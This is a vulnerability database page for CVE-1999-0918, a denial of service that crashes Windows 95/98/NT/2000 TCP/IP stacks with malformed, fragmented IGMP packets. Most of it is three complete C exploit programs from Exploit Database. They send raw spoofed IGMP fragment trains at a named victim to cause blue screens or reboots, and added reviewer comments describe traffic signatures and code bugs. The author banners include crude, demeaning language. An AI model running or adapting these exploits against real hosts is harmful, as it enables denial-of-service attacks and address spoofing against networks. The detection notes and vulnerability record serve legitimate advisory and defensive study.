CVE-1999-0918 : Detail

CVE-1999-0918

A03-Injection
0.43%V3
Network
2000-01-04
04h00 +00:00
2024-08-01
16h55 +00:00

CVE Description

Denial of service in various Windows systems via malformed, fragmented IGMP packets.

CVE Information

Related Weaknesses

CWE-ID Weakness Name Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.8 AV:N/AC:L/Au:N/C:N/I:N/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 19413

Publication date : 1999-07-02 22h00 +00:00
Author : Coolio
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/514/info
//
// The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably
// tolerate malformed IGMP headers. When one is received, the stack will
// sometimes fail with unpredictable results ranging from a Blue Screen to
// instantaneous reboot.
//
// Reviewer notes (defensive reading of this historical PoC, EDB-ID 19413):
//  - The traffic profile is IP protocol 2 (IGMP), fragmented, every fragment
//    claiming tot_len 1500, five fragments per round spaced 1-2 s apart,
//    ten rounds per run. The IP header checksum is computed once and not
//    refreshed after frag_off changes, so fragments 2..5 carry a stale
//    header checksum.
//  - Unless I_GROK is defined at compile time, the sender's uname() fields
//    (and a raw copy of its struct passwd) are written into the fragment
//    payload, which makes captured packets attributable to the sending host.
//  - Raw sockets (SOCK_RAW/IPPROTO_RAW) normally require elevated privilege.

/***
 Kox by Coolio ([email protected])

 this was a successful attempt to duplicate klepto/defile's kod win98 exploit
 and add spoofing support to it. me and defile made this a race to see who
 could do spoofing kod first. he won. (mine's better!) my kox and defile's
 skod output about the same packets but he had skod working a few hours
 before i had kox working.

 affected systems: windows 98, windows 98 SE, windows 2000 build 2000
 results: bluescreen, tcp/ip stack failure, lockup, or instant reboot

 thanks to klepto and defile for making kod, psilord for wanting to
 understand what we were doing, greg for telling me about iphdr.ihl, mancide
 for letting me use his win98 boxen to test on, and the few other people i
 crashed trying to get this working right. also thanks to the authors of
 elvis for making such a badass editor.
***/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <string.h>
#include <errno.h>
#include <pwd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/utsname.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/igmp.h>

/*
 * Print the banner and usage line, then terminate with exit status 1.
 * @param arg  argv[0], echoed in the usage line.
 */
void usage(char *arg)
{
    printf("Kox by Coolio ([email protected])\n");
    printf("Usage: %s <victim>\n", arg);
    exit(1);
}

/*
 * Intended to return a random IPv4 address in network byte order.
 *
 * What the code actually does: it formats a dotted quad (first octet
 * 23..213, the others 1..253) into a 16-byte heap buffer that is never
 * freed, then calls inet_aton() with a pointer to the START of `sin`
 * (i.e. onto sin_family/sin_port), not to sin.sin_addr. The value
 * returned, sin.sin_addr.s_addr, is therefore never written and is read
 * uninitialized (undefined behaviour). `he` is unused and calloc() is
 * unchecked. Left as-is: documented, not fixed.
 */
unsigned int randip()
{
    struct hostent *he;
    struct sockaddr_in sin;
    char *buf = (char *)calloc(1, sizeof(char) * 16);
    sprintf(buf, "%d.%d.%d.%d", (random()%191)+23, (random()%253)+1, (random()%253)+1, (random()%253)+1);
    inet_aton(buf, (struct in_addr *)&sin);   // writes into the first 4 bytes of sin, not sin.sin_addr
    return sin.sin_addr.s_addr;               // uninitialized read
}

/*
 * Standard one's-complement Internet checksum (RFC 1071 style).
 * @param buh  start of the region to sum, read as 16-bit words
 * @param len  length in bytes; a trailing odd byte is folded in as the
 *             low byte of a zero-padded 16-bit word
 * @return     the 16-bit checksum, already complemented
 */
unsigned short in_cksum(unsigned short *buh, int len)
{
    register long sum = 0;
    unsigned short oddbyte;
    register unsigned short answer;
    while(len > 1) {
        sum += *buh++;
        len -= 2;
    }
    if(len == 1) {
        oddbyte = 0;
        *((unsigned char *)&oddbyte) = *(unsigned char *)buh;
        sum += oddbyte;
    }
    sum = (sum >> 16) + (sum & 0xFFFF);   // fold the carries back in
    sum += (sum >> 16);
    answer = ~sum;
    return answer;
}

/*
 * Build one 1500-byte IGMP datagram and send it as five overlapping-size
 * fragments through a raw socket.
 *
 * @param victim  destination address (only sin_addr is read from it)
 * @param spoof   value written verbatim into the IP source address field
 * @return 0 on completion, 1 if socket() or the first sendto() fails
 *         (in the failure paths `pkt` is leaked and, after a failed
 *         sendto(), the socket is leaked too)
 *
 * Wire-level facts established by this code (useful for detection):
 *  - IP: version 4, ihl 5, ttl 255, tot_len 1500 on every fragment,
 *    id in 500..40499, protocol IGMP. The header checksum is computed
 *    once below; frag_off is rewritten in the send loop without a
 *    recompute, so fragments 2..5 have a checksum that does not match.
 *  - IGMP: type 0, group 0, checksum over the 8-byte IGMP header.
 *  - Payload: bytes from (IP hdr + IGMP hdr + 1) to the end are
 *    random() % 255, so 0xff never appears; the one byte right after
 *    the IGMP header is left zero by calloc().
 *  - Fragment schedule: offset 0 with MF, 1 s pause, then offsets
 *    1480*i bytes for i = 1..4 (MF set for i < 4), 2 s pause each.
 */
int nuke_igmp(struct sockaddr_in *victim, unsigned long spoof)
{
    int BIGIGMP = 1500;
    unsigned char *pkt;
    struct iphdr *ip;
    struct igmphdr *igmp;
    struct utsname *un;
    struct passwd *p;
    int i, s;
    int id = (random() % 40000) + 500;

    pkt = (unsigned char *)calloc(1, BIGIGMP);   // unchecked; zero-filled
    ip = (struct iphdr *)pkt;
    igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr));

    ip->version = 4;
    ip->ihl = (sizeof *ip) / 4;                  // header length in 32-bit words
    ip->ttl = 255;
    ip->tot_len = htons(BIGIGMP);
    ip->protocol = IPPROTO_IGMP;
    ip->id = htons(id);
    ip->frag_off = htons(IP_MF);                 // first fragment: offset 0, more-fragments set
    ip->saddr = spoof;
    ip->daddr = victim->sin_addr.s_addr;
    ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));   // never recomputed below

    igmp->type = 0;
    igmp->group = 0;
    igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr));

    // Fill the rest of the fragment with pseudo-random bytes (0..254).
    for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1; i < BIGIGMP; i++)
        pkt[i] = random() % 255;

#ifndef I_GROK
    // Default build: overwrite part of the payload with the sender's own
    // uname() output (sysname/nodename/release/... strings) and, 10 bytes
    // past that, a raw copy of the sender's struct passwd (whose members
    // are pointers, so mostly addresses rather than strings). These bytes
    // are transmitted on the wire, tying the packets to the sending host.
    un = (struct utsname *)(pkt + sizeof(struct iphdr) + sizeof(struct igmphdr) + 40);
    uname(un);
    p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10);   // GNU void* arithmetic
    memcpy(p, getpwuid(getuid()), sizeof(struct passwd));
#endif

    if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
        perror("error: socket()");
        return 1;                                // pkt leaked
    }
    // Note: passes struct sockaddr_in * where struct sockaddr * is expected, without a cast.
    if(sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in)) == -1) {
        perror("error: sendto()");
        return 1;                                // pkt and s leaked
    }
    usleep(1000000);

    // Remaining fragments: offset = (1480 * i) bytes expressed in 8-byte units;
    // only the last (i == 4) clears MF. tot_len stays 1500 and the IP
    // checksum is not refreshed.
    for(i = 1; i < 5; i++) {
        if(i > 3)
            ip->frag_off = htons(((BIGIGMP-20) * i) >> 3);
        else
            ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF);
        sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in));   // return value ignored
        usleep(2000000);
    }

    free(pkt);
    close(s);
    return 0;
}

/*
 * Entry point: resolve argv[1], then run nuke_igmp() ten times, each time
 * with a fresh value from randip() as the source address. Prints one '.'
 * per round. Only sin_addr, sin_port and sin_family of `victim` are
 * initialised; the remaining bytes are whatever was on the stack.
 * main() has no return statement (C99 treats falling off main as 0).
 */
int main(int argc, char *argv[])
{
    struct sockaddr_in victim;
    struct hostent *he;
    int i;

    srandom(time(NULL));                          // seeds both randip() and the payload filler
    if(argc < 2)
        usage(argv[0]);
    if((he = gethostbyname(argv[1])) == NULL) {
        herror(argv[1]);
        exit(1);
    }
    memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length);
    victim.sin_port = htons(0);
    victim.sin_family = PF_INET;

    printf("IGMP> ");
    fflush(stdout);
    for(i = 0; i < 10; i++) {
        nuke_igmp(&victim, randip());             // return value ignored
        printf(".");
        fflush(stdout);
    }
    printf("\n");
    fflush(stdout);
}
Exploit Database EDB-ID : 19414

Publication date : 1999-07-02 22h00 +00:00
Author : klepto
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/514/info
//
// The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably
// tolerate malformed IGMP headers. When one is received, the stack will
// sometimes fail with unpredictable results ranging from a Blue Screen to
// instantaneous reboot.
//
// Reviewer notes (defensive reading of this historical PoC, EDB-ID 19414):
//  - Traffic profile: IP protocol 2 (IGMP), IP id 48648, ttl 64, tot_len
//    field fixed at 10933 regardless of the bytes actually sent (220 or
//    1500). The IGMP header itself is never filled in (all zero).
//  - Fragments are transmitted in REVERSE order: the final fragment
//    (offset 0x73a, no MF) goes first, then offsets counting down from
//    0x681 in steps of 185 (each with MF) until offset 0. The whole train
//    is sent twice.
//  - The first packet of each run carries an IP checksum computed before
//    saddr/daddr were filled in, so it does not verify.
//  - Raw sockets normally require elevated privilege.

/*
 ::: kod.c (kiss of death) version 1.2
 ::: [author] kod.c bug found by klepto / [email protected] / rewritten by ignitor / ignitor@EFnet
 ::: [stuph ] works on bsd/linux/*nix
 ::: [notes ] bluescreens windows users(98/98se) and kills tcp stack
 ::: [m$ bug] windows handles igmp badly and this is the result
 ::: [greets] amputee/nizda/nyt/ignitor/skyline/codelogic/ill`/conio/egotr ip/TFreak/napster
 ::: [greets] dist(test monkey)/naz(you rule period.)/#havok/ #irc_addict/#kgb/#eof/everyone
 ::: [action] ./kod <host> and BEWM!
 ::: [rant ] there will be lots of rewrites to this.. just get our name right! de omnibus dubitandum
*/

/*
 windows core dump output (*whee*)
 An exception 0E has occurred at 0028:C14C9212 in VxD VIP (01) + 00006C72.
 This was called from 0028:C183FF54 in VcD PPPMAC (04) + 000079BR.
 It may be possible to continue normally(*not*).
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

/*
 * Hand-rolled IPv4 header. The bit-field order (ihl before version) only
 * yields the wire layout on little-endian hosts; no <netinet/ip.h> is used.
 */
struct iphdr {
    unsigned char ihl:4, version:4, tos;
    unsigned short tot_len, id, frag_off;
    unsigned char ttl, protocol;
    unsigned short check;
    unsigned int saddr, daddr;
};

/* Hand-rolled 8-byte IGMP header; never written to in this program. */
struct igmphdr {
    unsigned char type, code;
    unsigned short cksum;
    struct in_addr group;
};

unsigned short in_chksum(unsigned short *, int);
long resolve(char *);

/*
 * Resolve a host name to an IPv4 address.
 * @param host  name or dotted quad passed to gethostbyname()
 * @return the first address, or -1 on lookup failure (callers below do not
 *         check for -1). Only h_length bytes of `addr` are written, so on
 *         platforms where long is wider than 4 bytes the upper bytes are
 *         uninitialized; the callers truncate it back to 32 bits anyway.
 */
long resolve(char *host)
{
    struct hostent *hst;
    long addr;
    hst = gethostbyname(host);
    if (hst == NULL)
        return(-1);
    memcpy(&addr, hst->h_addr, hst->h_length);
    return(addr);
}

/*
 * Entry point. argv[1] is the address written into the IP source field,
 * argv[2] the destination. Builds one 1500-byte buffer and sends it as a
 * reverse-ordered fragment train, twice. Always returns 1.
 *
 * Byte-level facts: buf is zeroed; ihl 5, version 4, tos 0, tot_len 10933,
 * id 48648, ttl 64, protocol IGMP. `dst` has only sin_addr and sin_family
 * set. The `igmp` pointer is assigned but never dereferenced, so the IGMP
 * header stays all-zero. socket() failure is silent (return 1).
 */
int main(int argc, char *argv[])
{
    struct sockaddr_in dst;
    struct iphdr *ip;
    struct igmphdr *igmp;
    long daddr, saddr;
    int s, i=0, c, len;
    char buf[1500];

    if (argc < 3) {
        printf("KOD spoofer by Ignitor and klepto\n");
        printf("Usage: %s <src> <dst>\n", *argv);
        return(1);
    }
    daddr = resolve(argv[2]);   // -1 on failure is not checked
    saddr = resolve(argv[1]);

    memset(buf, 0, 1500);
    ip = (struct iphdr *)&buf;
    igmp = (struct igmphdr *)&buf[sizeof(struct iphdr)];   // unused thereafter
    dst.sin_addr.s_addr = daddr;
    dst.sin_family = AF_INET;

    ip->ihl = 5;
    ip->version = 4;
    ip->tos = 0;
    ip->tot_len = htons(10933);  // fixed claim; does not match the 220/1500 bytes sent
    ip->id = htons(48648);
    ip->ttl = 64;
    ip->protocol = IPPROTO_IGMP;
    // Checksum taken BEFORE saddr/daddr are stored: the first datagram of
    // each outer iteration goes out with a stale header checksum.
    ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
    ip->saddr = saddr;
    ip->daddr = daddr;

    s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (s == -1)
        return(1);

    printf("Sending IGMP packets: %s -> %s\n", argv[1], argv [2]);
    for (c=0;c<2;c++) {
        // First packet: the LAST fragment (offset 0x73a, MF clear), 220 bytes.
        len = 220;
        ip->frag_off = htons(0x73a);
        for (i=0;;i++) {
            if (sendto(s,&buf,len,0,(struct sockaddr *)&dst,sizeof (struct sockaddr_in)) == -1) {
                perror("Error sending packet");
                exit(-1);
            }
            if (ntohs(ip->frag_off) == 0x2000)   // just sent offset 0 with MF: train complete
                break;
            len = 1500;
            // Then count down: MF|0x681, minus 185 per step (0x681 == 9 * 185),
            // so the ninth decrement lands exactly on MF|0 (0x2000).
            if (!i)
                ip->frag_off = htons(0x2681);
            else
                ip->frag_off = htons(ntohs(ip->frag_off) - 185);
            ip->check = in_chksum((unsigned short *)ip, sizeof (struct iphdr));
        }
    }
    return(1);
}

/*
 * Standard one's-complement Internet checksum.
 * @param addr  region to sum as 16-bit words
 * @param len   length in bytes; a trailing odd byte is folded in
 * @return the complemented 16-bit sum
 */
unsigned short in_chksum(unsigned short *addr, int len)
{
    register int nleft = len;
    register int sum = 0;
    u_short answer = 0;
    while (nleft > 1) {
        sum += *addr++;
        nleft -= 2;
    }
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *)addr;
        sum += answer;
    }
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return(answer);
}
Exploit Database EDB-ID : 19415

Publication date : 1999-04-05 22h00 +00:00
Author : Rob Mosher
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/514/info
//
// The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably
// tolerate malformed IGMP headers. When one is received, the stack will
// sometimes fail with unpredictable results ranging from a Blue Screen to
// instantaneous reboot.
//
// Reviewer notes (defensive reading of this historical PoC, EDB-ID 19415):
//  - Traffic profile: IP protocol 2 (IGMP), ttl 255, a constant source
//    address (2147100000 written as a host-order integer), IGMP type 2 /
//    code 31 / group 128.1.1.1, and a payload of repeated 'A' (0x41) bytes.
//  - Each of 15 rounds sends four fragments at offsets 0, 185, 740 and 925
//    (8-byte units); the 1480-byte fragments at offsets 0 and 185 end at
//    byte 2960 while the next starts at byte 5920, so the datagram can
//    never be completed by the receiver's reassembler.
//  - ip_sum is left 0, ip_id/ip_len are stored in host byte order; whether
//    the kernel fills or converts them for IPPROTO_RAW is platform dependent.
//  - <string.h> and <arpa/inet.h> are not included, so memset/memcpy/
//    inet_aton are implicitly declared (an error in modern C).

/*
** pimp.c 6/4/99 by Rob Mosher: [email protected]
** exploits bug in m$'s ip stack
** rewrite by nyt@EFnet
** bug found by klepto
** usage: pimp <host>
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <sys/socket.h>

/* Hand-rolled 8-byte IGMP header (no <netinet/igmp.h> is included). */
struct igmp {
    unsigned char igmp_type;
    unsigned char igmp_code;
    unsigned short igmp_cksum;
    struct in_addr igmp_group;
};

/* Print a message and terminate with exit(-1) (status 255). Not do/while-wrapped. */
#define ERROR(a) {printf("ERROR: %s\n", a);exit(-1);}

u_long resolve(char *);

/*
 * Entry point: resolve argv[1], open a raw socket, build a 1500-byte
 * buffer and send it as a four-fragment train 15 times, 0.5 s apart.
 *
 * `s_addr_in` is zeroed and only sin_addr is set (sin_family stays 0).
 * `pkt` is never freed and main() has no return statement.
 */
int main(int argc, char *argv[])
{
    int nsock, ctr;
    char *pkt, *data;
    struct ip *nip;
    struct igmp *nigmp;
    struct sockaddr_in s_addr_in;

    setvbuf(stdout, NULL, _IONBF, 0);   // unbuffered so the progress dots appear immediately
    printf("pimp.c by nyt\n");
    if(argc != 2)
        ERROR("usage: pimp <host>");
    if((nsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
        ERROR("could not create raw socket");
    pkt = malloc(1500);
    if(!pkt)
        ERROR("could not allocate memory");

    memset(&s_addr_in, 0, sizeof(s_addr_in));
    memset(pkt, 0, 1500);
    nip = (struct ip *) pkt;
    nigmp = (struct igmp *) (pkt + sizeof(struct ip));
    data = (char *)(pkt + sizeof(struct ip) + sizeof(struct igmp));
    // Everything after the IP + IGMP headers is 'A' — a distinctive payload.
    memset(data, 'A', 1500-(sizeof(struct ip) + sizeof(struct igmp)));

    s_addr_in.sin_addr.s_addr = resolve(argv[1]);
    nip->ip_v = 4;
    nip->ip_hl = 5;
    nip->ip_tos = 0;
    nip->ip_id = 69;                    // host byte order, no htons()
    nip->ip_ttl = 255;
    nip->ip_p = IPPROTO_IGMP;
    nip->ip_sum = 0;                    // never computed by this program
    nip->ip_dst.s_addr = s_addr_in.sin_addr.s_addr;
    nip->ip_src.s_addr = 2147100000;    // fixed source, stored as a host-order integer
    nigmp->igmp_type = 2;
    nigmp->igmp_code = 31;
    nigmp->igmp_cksum = 0;
    inet_aton("128.1.1.1", &nigmp->igmp_group);

    printf("pimpin' dem trick-ass-bitches");
    for(ctr = 0;ctr < 15;ctr++) {
        printf(".");
        // Fragment 1: offset 0, MF set, 1500 bytes. ip_len is host order here.
        nip->ip_len = 1500;
        nip->ip_off = htons(IP_MF);
        sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in));
        // Fragment 2: offset 1480 bytes (185 * 8), MF set.
        nip->ip_off = htons(1480/8)|htons(IP_MF);
        sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in));
        // Fragment 3: offset 5920 bytes, MF set — leaves bytes 2960..5919 unfilled.
        nip->ip_off = htons(5920/8)|htons(IP_MF);
        sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in));
        // Fragment 4: offset 7400 bytes, MF clear, 831 bytes.
        nip->ip_len = 831;
        nip->ip_off = htons(7400/8);
        sendto(nsock, pkt, 831, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in));
        usleep(500000);                 // all sendto() results are ignored
    }
    printf("*slap* *slap* bitch, who yo daddy\n");
    shutdown(nsock, 2);
    close(nsock);
}

/*
 * Resolve a host name to an IPv4 address, exiting on failure.
 * @param host  name or dotted quad passed to gethostbyname()
 * @return the first address as a u_long
 *
 * Note: the copy length is sizeof(he->h_addr), i.e. the size of a pointer,
 * not h_length. On platforms with 8-byte pointers this reads past the
 * 4-byte address in the hostent buffer; the caller then truncates the
 * result to 32 bits when storing it into s_addr.
 */
u_long resolve(char *host)
{
    struct hostent *he;
    u_long ret;
    if(!(he = gethostbyname(host))) {
        herror("gethostbyname()");
        exit(-1);
    }
    memcpy(&ret, he->h_addr, sizeof(he->h_addr));
    return ret;
}

Products Mentioned

Configuration 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_95 >> Version *

Microsoft>>Windows_98 >> Version *

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

References

http://www.securityfocus.com/bid/514
Tags : vdb-entry, x_refsource_BID